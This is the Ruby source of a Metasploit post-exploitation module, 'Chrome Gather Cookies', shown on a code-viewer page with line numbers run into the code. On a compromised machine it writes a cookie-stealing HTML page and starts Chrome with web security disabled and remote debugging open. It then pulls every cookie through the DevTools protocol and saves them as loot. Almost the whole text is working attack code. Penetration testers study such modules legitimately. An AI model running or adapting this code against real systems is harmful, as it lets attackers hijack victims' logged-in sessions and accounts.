CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/post/multi/gather/chrome_cookies.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File78def initialize(info = {})9super(10update_info(11info,12'Name' => 'Chrome Gather Cookies',13'Description' => 'Read all cookies from the Default Chrome profile of the target user.',14'License' => MSF_LICENSE,15'Author' => ['mangopdf <mangodotpdf[at]gmail.com>'],16'Platform' => %w[linux unix bsd osx windows],17'SessionTypes' => %w[meterpreter shell]18)19)2021register_options(22[23OptString.new('CHROME_BINARY_PATH', [false, "The path to the user's Chrome binary (leave blank to use the default for the OS)", '']),24OptString.new('WRITEABLE_DIR', [false, 'Where to write the html used to steal cookies temporarily, and the cookies. Leave blank to use the default for the OS (/tmp or AppData\\Local\\Temp)', '']),25OptInt.new('REMOTE_DEBUGGING_PORT', [false, 'Port on target machine to use for remote debugging protocol', 9222])26]27)28end2930def configure_for_platform31vprint_status('Determining session platform')32vprint_status("Platform: #{session.platform}")33vprint_status("Type: #{session.type}")3435if session.platform == 'windows'36username = get_env('USERNAME').strip37else38username = cmd_exec 'id -un'39end4041temp_storage_dir = datastore['WRITABLE_DIR']4243case session.platform44when 'unix', 'linux', 'bsd', 'python'45chrome = 'google-chrome'46user_data_dir = "/home/#{username}/.config/google-chrome"47temp_storage_dir = temp_storage_dir.nil? ? '/tmp' : temp_storage_dir48@cookie_storage_path = "#{temp_storage_dir}/#{Rex::Text.rand_text_alphanumeric(10..15)}"49when 'osx'50chrome = '"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"'51user_data_dir = expand_path "/Users/#{username}/Library/Application Support/Google/Chrome"52temp_storage_dir = temp_storage_dir.nil? ? '/tmp' : temp_storage_dir53@cookie_storage_path = "#{temp_storage_dir}/#{Rex::Text.rand_text_alphanumeric(10..15)}"54when 'windows'55chrome = '"\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"'56user_data_dir = "\\Users\\#{username}\\AppData\\Local\\Google\\Chrome\\User Data"57temp_storage_dir = temp_storage_dir.nil? ? "\\Users\\#{username}\\AppData\\Local\\Temp" : temp_storage_dir58@cookie_storage_path = "#{user_data_dir}\\chrome_debug.log"59else60fail_with Failure::NoTarget, "Unsupported platform: #{session.platform}"61end6263unless datastore['CHROME_BINARY_PATH'].empty?64chrome = datastore['CHROME_BINARY_PATH']65end6667=begin68# #writable? not supported on windows69unless writable? @temp_storage_dir70fail_with Failure::BadConfig, "#{@temp_storage_dir} is not writable"71end72=end7374@html_storage_path = create_cookie_stealing_html(temp_storage_dir)7576chrome_debugging_args = []7778if session.platform == 'windows'79# `--headless` doesn't work on Windows, so use an offscreen window instead.80chrome_debugging_args << '--window-position=0,0'81chrome_debugging_args << '--enable-logging --v=1'82else83chrome_debugging_args << '--headless'84end8586chrome_debugging_args_all_platforms = [87'--disable-translate',88'--disable-extensions',89'--disable-background-networking',90'--safebrowsing-disable-auto-update',91'--disable-sync',92'--metrics-recording-only',93'--disable-default-apps',94'--mute-audio',95'--no-first-run',96'--disable-web-security',97'--disable-plugins',98'--disable-gpu'99]100101chrome_debugging_args << chrome_debugging_args_all_platforms102chrome_debugging_args << " --user-data-dir=\"#{user_data_dir}\""103chrome_debugging_args << " --remote-debugging-port=#{datastore['REMOTE_DEBUGGING_PORT']}"104chrome_debugging_args << " #{@html_storage_path}"105106@chrome_debugging_cmd = "#{chrome} #{chrome_debugging_args.join(' ')}"107end108109def create_cookie_stealing_html(temp_storage_dir)110cookie_stealing_html = %(111<!DOCTYPE html>112<html lang="en">113<head>114<meta charset="utf-8">115<title>index.html</title>116</head>117<body>118<script>119120var remoteDebuggingPort = #{datastore['REMOTE_DEBUGGING_PORT']};121var request = new XMLHttpRequest();122request.open("GET", "http://localhost:" + remoteDebuggingPort + "/json");123request.responseType = 'json';124request.send();125126request.onload = function() {127var webSocketDebuggerUrl = request.response[0].webSocketDebuggerUrl;128console.log(webSocketDebuggerUrl);129var connection = new WebSocket(webSocketDebuggerUrl);130131connection.onopen = function () {132connection.send('{"id": 1, "method": "Network.getAllCookies"}');133};134135connection.onmessage = function (e) {136var cookies_blob = JSON.stringify(JSON.parse(e.data).result.cookies);137console.log('REMOTE_DEBUGGING|' + cookies_blob);138};139}140</script>141</body>142</html>143)144145# Where to temporarily store the cookie-stealing html146if session.platform == 'windows'147html_storage_path = "#{temp_storage_dir}\\#{Rex::Text.rand_text_alphanumeric(10..15)}.html"148else149html_storage_path = "#{temp_storage_dir}/#{Rex::Text.rand_text_alphanumeric(10..15)}.html"150end151152write_file(html_storage_path, cookie_stealing_html)153html_storage_path154end155156def cleanup157if file?(@html_storage_path)158vprint_status("Removing file #{@html_storage_path}")159rm_f @html_storage_path160end161162if file?(@cookie_storage_path)163vprint_status("Removing file #{@cookie_storage_path}")164rm_f @cookie_storage_path165end166end167168def get_cookies169if session.platform == 'windows'170chrome_cmd = @chrome_debugging_cmd.to_s171kill_cmd = 'taskkill /f /pid'172else173chrome_cmd = "#{@chrome_debugging_cmd} > #{@cookie_storage_path} 2>&1"174kill_cmd = 'kill -9'175end176177if session.type == 'meterpreter'178chrome_pid = cmd_exec_get_pid(chrome_cmd)179print_status "Activated Chrome's Remote Debugging (pid: #{chrome_pid}) via #{chrome_cmd}"180Rex.sleep(5)181182# read_file within if/else block because kill was terminating sessions on OSX during testing183chrome_output = read_file(@cookie_storage_path)184185# Kills spawned chrome process in windows meterpreter sessions.186# In OSX and Linux the meterpreter sessions would stop as well.187if session.platform == 'windows'188kill_output = cmd_exec "#{kill_cmd} #{chrome_pid}"189end190else191# Using shell_command for backgrounding process (&)192client.shell_command("#{chrome_cmd} &")193print_status "Activated Chrome's Remote Debugging via #{chrome_cmd}"194Rex.sleep(5)195196chrome_output = read_file(@cookie_storage_path)197end198199cookies_msg = ''200chrome_output.each_line do |line|201if line =~ /REMOTE_DEBUGGING/202print_good('Found Match')203cookies_msg = line204end205end206207fail_with(Failure::Unknown, 'Failed to retrieve cookie data') if cookies_msg.empty?208209# Slice off the "REMOTE_DEBUGGING|" delimiter and trailing source info210cookies_json = cookies_msg.split('REMOTE_DEBUGGING|')[1]211cookies_json.split('", source: file')[0]212end213214def save(msg, data, ctype = 'text/json')215ltype = 'chrome.gather.cookies'216loot = store_loot ltype, ctype, session, data, nil, msg217print_good "#{msg} stored in #{loot}"218end219220def run221fail_with Failure::BadConfig, 'No session found, giving up' if session.nil?222223# Issues with write_file. Maybe a path problem?224if session.platform == 'windows' && session.type == 'shell'225fail_with Failure::BadConfig, 'Windows shell session not support, giving up'226end227228unless session.platform == 'windows' && session.type == 'meterpreter'229print_warning 'This module will leave a headless Chrome process running on the target machine.'230end231232configure_for_platform233cookies = get_cookies234cookies_parsed = JSON.parse cookies235save "#{cookies_parsed.length} Chrome Cookies", cookies236end237end238239240